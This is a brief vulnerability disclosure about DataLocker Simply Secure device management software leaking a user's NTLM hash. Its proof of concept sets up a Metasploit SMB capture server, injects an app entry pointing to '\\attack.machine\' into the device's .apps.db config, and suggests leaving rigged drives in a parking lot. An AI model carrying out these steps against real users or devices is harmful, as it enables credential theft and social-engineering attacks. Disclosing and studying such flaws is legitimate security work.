I found that the DataLocker Simply Secure device management software can be used to send the current users NTLM hash to any remote server an attacker chooses with no interaction from the user and without the users knowledge. The user simply has to run the unlock software and input the correct password, which auto launches the management software, triggering a SMB call.
This vulnerability depends on an insider threat or malware. You could drop these in a parking lot and put the password in the cap on a small piece or paper or something. Because its password protected, people might be more likely to want to check it out.
PoC:
Set up SMB server to prompt for domain credentials on connect. (Metasploit: auxiliary/server/capture/smb)
Edit management software config to include path to SMB server as an app. (Drive Letter:\.Apps\.apps.db)
Add content after AdditionalApplications tag:
< Appl>
< Identifier>0< /Identifier>
< AppPath>\\attack.machine\< /AppPath>
< Args></ Args>
< IconPath></ IconPath>
< DisplayName></ DisplayName>
< Summary></ Summary>
< Url></ Url>
< InternalVersion>0< /InternalVersion>
< OS>0</ OS>
< /Appl>
"Remove spaces"
Close and relock device. Move to another computer or re-run unlock software.
Authenticate to device, triggering SMB request.
View Metasploit for NTLM hash.
Why they would allow this, or just didn't think of it when they were developing the software, I dont know.
